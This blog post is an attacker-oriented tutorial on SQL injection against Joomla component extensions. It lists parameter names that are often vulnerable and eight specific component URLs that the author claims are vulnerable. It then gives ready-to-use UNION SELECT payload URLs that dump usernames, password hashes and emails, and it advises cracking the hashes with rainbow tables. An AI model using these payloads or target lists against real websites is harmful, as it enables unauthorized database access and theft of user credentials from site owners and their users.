The probably most common case for hacked Joomla websites is that a SQL injection vulnerability was exploited. A typical URL which is affected by this type of vulnerability looks like this:
index.php?option=com_blabla&category=5&Item=2
Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page
You can find out if a parameter is vulnerable when you change its value from e.g. category=5 to category='.
Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page
You can find out if a parameter is vulnerable when you change its value from e.g. category=5 to category='.
Press enter and look for MySQL errors in the website. If you find one, you might have discovered a SQL inkjection vulnerability.
In order to give you a better understanding and feeling of how vulnerable URLs might look like, I just show you some URLs which are known to be vulnerable (I discovered them):
URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id
URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
&Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid
URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid
URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid
URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID
URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid
URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id
URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp
Notice how many parameters look familiar to you? Yes, I mentioned them
earlier as well-known parameters which are affected on regular
basis :)
Since every Joomla database contains the same structure (like the same
tables etc.), we know enough to inject a SQL statement:
Example #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\
username, password)--
Example #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\
AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\
8,9,10,11,12--
Example #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\
group_concat(0x503077337220743020743368206330777321,name,username,\
password,email,usertype,0x503077337220743020743368206330777321)--
The selected information will be shown within the website.
Select a username and password from the table and try to crack the
MD5 hash with the help of raindbow tables.
SQL injections in Joomla give us so much freedom as we can get. You can
select everything you want from the database, and if you are lucky,
there are also other tables in the databases which do not belong
to Joomla but still contain some very interesting information.
0 comments:
Post a Comment
WELLCOME MY WEB